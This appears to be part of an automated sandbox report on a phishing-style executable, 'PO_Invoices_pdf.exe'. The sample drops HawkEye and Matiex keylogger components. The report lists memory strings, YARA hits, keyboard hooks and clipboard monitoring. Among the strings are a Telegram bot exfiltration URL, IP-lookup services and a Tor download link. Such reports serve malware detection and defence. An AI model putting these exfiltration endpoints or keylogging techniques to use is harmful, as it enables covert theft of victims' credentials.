                            Source: hawkgoods.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                            Source: vbc.exe, 00000012.00000003.306146332.000000000238B000.00000004.00000001.sdmpString found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5723238221569;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1601453683&rver=6.0.5286.0&wp=MBI_SSL&wreply=https:%2F%2fwww.bing.com%2Fsecure%2FPassport.aspx%3Fpopup%3D1%26ssl%3D1&lc=2055&id=264960&checkda=1https://login.live.com/login.srfhttps://www.google.com/chrome/https://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/https://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://go.microsoft.com/fwlink/?LinkId=838604https://go.microsoft.com/fwlink/https://go.microsoft.com/fwlink/p/?LinkId=255141https://go.microsoft.com/fwlink/p/https://go.microsoft.com/fwlink/?LinkId=517287https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=7162084889081;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=7162084889081;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=5657692158540;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=5657692158540;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=5723238221569;gtm=2wg9g1;
~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=5723238221569;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fabout:blankhttps://www.bing.com/orgid/idtoken/nosigninhttps://www.bing.com/search?q=chrome+download&src=IE-SearchBox&FORM=IESR4A&pc=EUPP_https://www.bing.com/searchhttps://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5723238221569;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttp://www.msn.com/?ocid=iehphttp://www.msn.com/http://www.msn.com/de-ch/?ocid=iehphttp://www.msn.com/de-ch/https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e34c7&response_type=id_token&nonce=351a037b-0597-47d9-b2c1-bfb1c870bba0&redirect_uri=https%3a%2f%2fwww.bing.com%2forgid%2fidtoken%2fnosignin&scope=openid&response_mode=form_post&msafed=0&prompt=none&state=%7b%22ig%22%3a%223B109BCA2CB841A781265B1D219195C1%22%7dhttps://login.microsoftonline.com/common/oauth2/authorizehttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=
                            Source: unknownDNS traffic detected: queries for: 69.170.12.0.in-addr.arpa
                            Source: origigoods40.exe, 00000007.00000002.455680542.0000000002FE1000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                            Source: origigoods40.exe, 00000007.00000002.455680542.0000000002FE1000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
                            Source: Matiexgoods.exe, 00000008.00000002.699162061.00000000034E1000.00000004.00000001.sdmpString found in binary or memory: http://checkip.dyndns.org/
                            Source: Matiexgoods.exe, 00000008.00000002.699162061.00000000034E1000.00000004.00000001.sdmpString found in binary or memory: http://checkip.dyndns.org/HBFl
                            Source: Matiexgoods.exe, 00000008.00000003.461245193.00000000068F6000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                            Source: powershell.exe, 00000003.00000002.378127949.000000000088E000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000003.281965972.0000000003BE0000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000002.287278765.0000000000403000.00000040.00000001.sdmp, hawkgoods.exe, 00000006.00000002.390146582.0000000003A21000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
                            Source: powershell.exe, 00000003.00000002.377998642.00000000007E6000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                            Source: Matiexgoods.exe, 00000008.00000002.694705884.0000000001823000.00000004.00000020.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
                            Source: Matiexgoods.exe, 00000008.00000003.461245193.00000000068F6000.00000004.00000001.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
                            Source: origigoods40.exe, 00000007.00000002.455680542.0000000002FE1000.00000004.00000001.sdmpString found in binary or memory: http://csARxe.com
                            Source: PO_Invoices_pdf.exe, 00000000.00000003.247874552.000000000654D000.00000004.00000001.sdmp, hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
                            Source: PO_Invoices_pdf.exe, 00000000.00000003.247874552.000000000654D000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.com(
                            Source: Matiexgoods.exe, 00000008.00000003.443342117.0000000009311000.00000004.00000001.sdmpString found in binary or memory: http://ns.ado/1
                            Source: Matiexgoods.exe, 00000008.00000003.443342117.0000000009311000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobe.c/g
                            Source: Matiexgoods.exe, 00000008.00000003.443342117.0000000009311000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobe.cobj
                            Source: powershell.exe, 00000003.00000002.386788256.00000000058A3000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000003.281965972.0000000003BE0000.00000004.00000001.sdmp, hawkgoods.exe, 00000006.00000002.390146582.0000000003A21000.00000004.00000001.sdmp, Matiexgoods.exe, 00000008.00000003.461245193.00000000068F6000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                            Source: Matiexgoods.exe, 00000008.00000002.694705884.0000000001823000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.digicert.com0:
                            Source: Matiexgoods.exe, 00000008.00000003.461245193.00000000068F6000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                            Source: powershell.exe, 00000003.00000002.382114009.0000000004983000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                            Source: powershell.exe, 00000003.00000002.382114009.0000000004983000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.pngL
                            Source: powershell.exe, 00000003.00000002.381287871.0000000004841000.00000004.00000001.sdmp, Matiexgoods.exe, 00000008.00000002.699162061.00000000034E1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                            Source: PO_Invoices_pdf.exe, PO_Invoices_pdf.exe, 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmp, powershell.exe, 00000003.00000003.370812465.0000000008DB1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/DataSet1.xsd
                            Source: hawkgoods.exe, 00000006.00000002.387343775.0000000002A21000.00000004.00000001.sdmpString found in binary or memory: http://whatismyipaddress.com
                            Source: hawkgoods.exeString found in binary or memory: http://whatismyipaddress.com/
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000003.281965972.0000000003BE0000.00000004.00000001.sdmp, hawkgoods.exe, 00000006.00000002.383895800.00000000002F2000.00000002.00020000.sdmpString found in binary or memory: http://whatismyipaddress.com/-
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.300417704.0000000006600000.00000002.00000001.sdmp, hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                            Source: powershell.exe, 00000003.00000002.382114009.0000000004983000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                            Source: powershell.exe, 00000003.00000002.382114009.0000000004983000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlL
                            Source: PO_Invoices_pdf.exe, 00000000.00000003.250459528.0000000006513000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.300417704.0000000006600000.00000002.00000001.sdmp, hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
                            Source: PO_Invoices_pdf.exe, 00000000.00000003.250141662.0000000006515000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.como.
                            Source: PO_Invoices_pdf.exe, 00000000.00000003.250141662.0000000006515000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.como.R
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.300417704.0000000006600000.00000002.00000001.sdmp, hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
                            Source: hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.300417704.0000000006600000.00000002.00000001.sdmp, hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.300417704.0000000006600000.00000002.00000001.sdmp, hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.300417704.0000000006600000.00000002.00000001.sdmp, PO_Invoices_pdf.exe, 00000000.00000003.254406255.0000000006512000.00000004.00000001.sdmp, hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.300417704.0000000006600000.00000002.00000001.sdmp, hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.300417704.0000000006600000.00000002.00000001.sdmp, hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.300417704.0000000006600000.00000002.00000001.sdmp, hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                            Source: PO_Invoices_pdf.exe, 00000000.00000003.254406255.0000000006512000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comF
                            Source: PO_Invoices_pdf.exe, 00000000.00000003.272424177.0000000006510000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comY
                            Source: PO_Invoices_pdf.exe, 00000000.00000003.254406255.0000000006512000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.coma3
                            Source: PO_Invoices_pdf.exe, 00000000.00000003.272424177.0000000006510000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comceto
                            Source: PO_Invoices_pdf.exe, 00000000.00000003.254406255.0000000006512000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comd
                            Source: PO_Invoices_pdf.exe, 00000000.00000003.254406255.0000000006512000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comdV
                            Source: PO_Invoices_pdf.exe, 00000000.00000003.254406255.0000000006512000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comdsed
                            Source: PO_Invoices_pdf.exe, 00000000.00000003.272424177.0000000006510000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comm
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.300417704.0000000006600000.00000002.00000001.sdmp, hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.300417704.0000000006600000.00000002.00000001.sdmp, hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.300417704.0000000006600000.00000002.00000001.sdmp, hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.300417704.0000000006600000.00000002.00000001.sdmp, hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                            Source: PO_Invoices_pdf.exe, 00000000.00000003.249338917.0000000006516000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnR
                            Source: PO_Invoices_pdf.exe, 00000000.00000003.250141662.0000000006515000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnT
                            Source: PO_Invoices_pdf.exe, 00000000.00000003.249338917.0000000006516000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cniac
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.300417704.0000000006600000.00000002.00000001.sdmp, hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                            Source: PO_Invoices_pdf.exe, 00000000.00000003.256526982.0000000006539000.00000004.00000001.sdmp, PO_Invoices_pdf.exe, 00000000.00000002.300417704.0000000006600000.00000002.00000001.sdmp, hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.300417704.0000000006600000.00000002.00000001.sdmp, hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
                            Source: PO_Invoices_pdf.exe, 00000000.00000003.249068129.0000000006515000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr9
                            Source: PO_Invoices_pdf.exe, 00000000.00000003.249068129.0000000006515000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.krF
                            Source: PO_Invoices_pdf.exe, 00000000.00000003.250877364.0000000006512000.00000004.00000001.sdmp, hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                            Source: PO_Invoices_pdf.exe, 00000000.00000003.250877364.0000000006512000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/l
                            Source: hawkgoods.exe, 00000006.00000002.390146582.0000000003A21000.00000004.00000001.sdmpString found in binary or memory: http://www.nirsoft.net/
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.300417704.0000000006600000.00000002.00000001.sdmp, hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.300417704.0000000006600000.00000002.00000001.sdmp, hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
                            Source: PO_Invoices_pdf.exe, 00000000.00000003.251741662.000000000654D000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com-mq
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.300417704.0000000006600000.00000002.00000001.sdmp, hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
                            Source: PO_Invoices_pdf.exe, 00000000.00000003.249068129.0000000006515000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.krn-u
                            Source: hawkgoods.exe, 00000006.00000002.387343775.0000000002A21000.00000004.00000001.sdmpString found in binary or memory: http://www.site.com/logs.php
                            Source: hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
                            Source: PO_Invoices_pdf.exe, 00000000.00000003.249778536.0000000006512000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com-cz
                            Source: PO_Invoices_pdf.exe, 00000000.00000003.248176476.000000000654D000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.net
                            Source: PO_Invoices_pdf.exe, 00000000.00000003.247998925.000000000654D000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.net-d
                            Source: PO_Invoices_pdf.exe, 00000000.00000003.248176476.000000000654D000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.net-siu
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.300417704.0000000006600000.00000002.00000001.sdmp, hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
                            Source: PO_Invoices_pdf.exe, 00000000.00000003.248099180.000000000654D000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netn
                            Source: PO_Invoices_pdf.exe, 00000000.00000003.248176476.000000000654D000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netx
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.300417704.0000000006600000.00000002.00000001.sdmp, hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.300417704.0000000006600000.00000002.00000001.sdmp, hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                            Source: PO_Invoices_pdf.exe, 00000000.00000003.250141662.0000000006515000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cnaN
                            Source: vbc.exe, 00000012.00000003.306146332.000000000238B000.00000004.00000001.sdmpString found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5723238221569;gtm=
                            Source: origigoods40.exe, 00000007.00000002.455680542.0000000002FE1000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%GETMozilla/5.0
Source: Matiexgoods.exe, 00000008.00000002.699162061.00000000034E1000.00000004.00000001.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=Createutf-8Win32_ComputerSystemModelManufactu
Source: powershell.exe, 00000003.00000002.386788256.00000000058A3000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000003.00000002.386788256.00000000058A3000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000003.00000002.386788256.00000000058A3000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/License
Source: Matiexgoods.exe, 00000008.00000002.699162061.00000000034E1000.00000004.00000001.sdmp | String found in binary or memory: https://freegeoip.app/xml/
Source: Matiexgoods.exe, 00000008.00000002.699162061.00000000034E1000.00000004.00000001.sdmp | String found in binary or memory: https://freegeoip.app/xml/LoadTimeZoneCountryNameCountryCodehttps://www.geodatatool.com/en/?ip=/
Source: powershell.exe, 00000003.00000002.382114009.0000000004983000.00000004.00000001.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.382114009.0000000004983000.00000004.00000001.sdmp | String found in binary or memory: https://github.com/Pester/PesterL
Source: Matiexgoods.exe, 00000008.00000002.699162061.00000000034E1000.00000004.00000001.sdmp | String found in binary or memory: https://i.imgur.com/GJD7Q5y.png195.239.51.11795.26.248.2989.208.29.13389.187.165.4792.118.13.1895.26
Source: hawkgoods.exe | String found in binary or memory: https://login.yahoo.com/config/login
Source: powershell.exe, 00000003.00000002.386788256.00000000058A3000.00000004.00000001.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: Matiexgoods.exe, 00000008.00000002.699162061.00000000034E1000.00000004.00000001.sdmp | String found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: Matiexgoods.exe, 00000008.00000003.461245193.00000000068F6000.00000004.00000001.sdmp | String found in binary or memory: https://sectigo.com/CPS0
Source: Matiexgoods.exe, 00000008.00000002.694705884.0000000001823000.00000004.00000020.sdmp | String found in binary or memory: https://www.digicert.com/CPS0
Source: hawkgoods.exe | String found in binary or memory: https://www.google.com/accounts/servicelogin
Source: PO_Invoices_pdf.exe, 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000003.273863512.0000000003E4D000.00000004.00000001.sdmp, origigoods40.exe | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: origigoods40.exe, 00000007.00000002.455680542.0000000002FE1000.00000004.00000001.sdmp | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
Source: unknown | Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown | Network traffic detected: HTTP traffic on port 49785 -> 443

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected HawkEye Keylogger
Source: Yara match | File source: 00000014.00000002.379809632.0000000005930000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000025.00000002.619183539.0000000005360000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001B.00000000.417887646.0000000000A42000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.383895800.00000000002F2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001A.00000002.433264598.0000000000403000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001B.00000002.636644097.0000000000A42000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001B.00000002.641318198.00000000031B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.287278765.0000000000403000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 4888, type: MEMORY
Source: Yara match | File source: Process Memory Space: PO_Invoices_pdf.exe PID: 5372, type: MEMORY
Source: Yara match | File source: dropped/hawkgoods.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe, type: DROPPED
Source: Yara match | File source: 27.2.hawkgoods.exe.a40000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.0.hawkgoods.exe.34fa72.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.0.hawkgoods.exe.2f0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 27.0.hawkgoods.exe.a48208.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 27.0.hawkgoods.exe.a9fa72.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.hawkgoods.exe.2f9c0d.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 27.2.hawkgoods.exe.a49c0d.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 27.0.hawkgoods.exe.a49c0d.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 26.2.RegAsm.exe.4031bf.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 27.2.hawkgoods.exe.a9fa72.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.hawkgoods.exe.2f8208.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.hawkgoods.exe.2f0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.0.hawkgoods.exe.2f8208.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 23.2.I$s#$lT3ssl.exe.4158f3f.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.RegAsm.exe.4031bf.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 27.0.hawkgoods.exe.a40000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.RegAsm.exe.4031bf.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 27.2.hawkgoods.exe.a48208.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.0.hawkgoods.exe.2f9c0d.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.PO_Invoices_pdf.exe.4398f3f.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 26.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.hawkgoods.exe.34fa72.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 26.2.RegAsm.exe.4095c7.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.RegAsm.exe.4095c7.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.RegAsm.exe.40afcc.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 26.2.RegAsm.exe.40afcc.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 23.2.I$s#$lT3ssl.exe.4156d80.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 27.2.hawkgoods.exe.31d8e20.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.PO_Invoices_pdf.exe.4396d80.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 23.2.I$s#$lT3ssl.exe.4156d80.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.PO_Invoices_pdf.exe.4398f3f.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.PO_Invoices_pdf.exe.40a9510.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 26.2.RegAsm.exe.4031bf.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 23.2.I$s#$lT3ssl.exe.4158f3f.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.hawkgoods.exe.2a48e20.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 23.2.I$s#$lT3ssl.exe.3e69510.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.PO_Invoices_pdf.exe.4396d80.5.raw.unpack, type: UNPACKEDPE
Contains functionality to log keystrokes (.Net Source)
Source: hawkgoods.exe.5.dr, Form1.cs | .Net Code: HookKeyboard
Source: 6.0.hawkgoods.exe.2f0000.0.unpack, Form1.cs | .Net Code: HookKeyboard
Source: 6.2.hawkgoods.exe.2f0000.0.unpack, Form1.cs | .Net Code: HookKeyboard
Installs a global keyboard hook
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Windows user hook set: 0 keyboard low level C:\Users\user~1\AppData\Local\Temp\hawkgoods.exe
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Windows user hook set: 0 keyboard low level C:\Users\user~1\AppData\Local\Temp\hawkgoods.exe
Source: PO_Invoices_pdf.exe, 00000000.00000002.275896420.0000000001448000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Local\Temp\origigoods40.exe | Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe | Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe | Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Local\Temp\origigoods40.exe | Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe | Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe | Window created: window name: CLIPBRDWNDCLASS

System Summary:

Malicious sample detected (through community Yara rule)
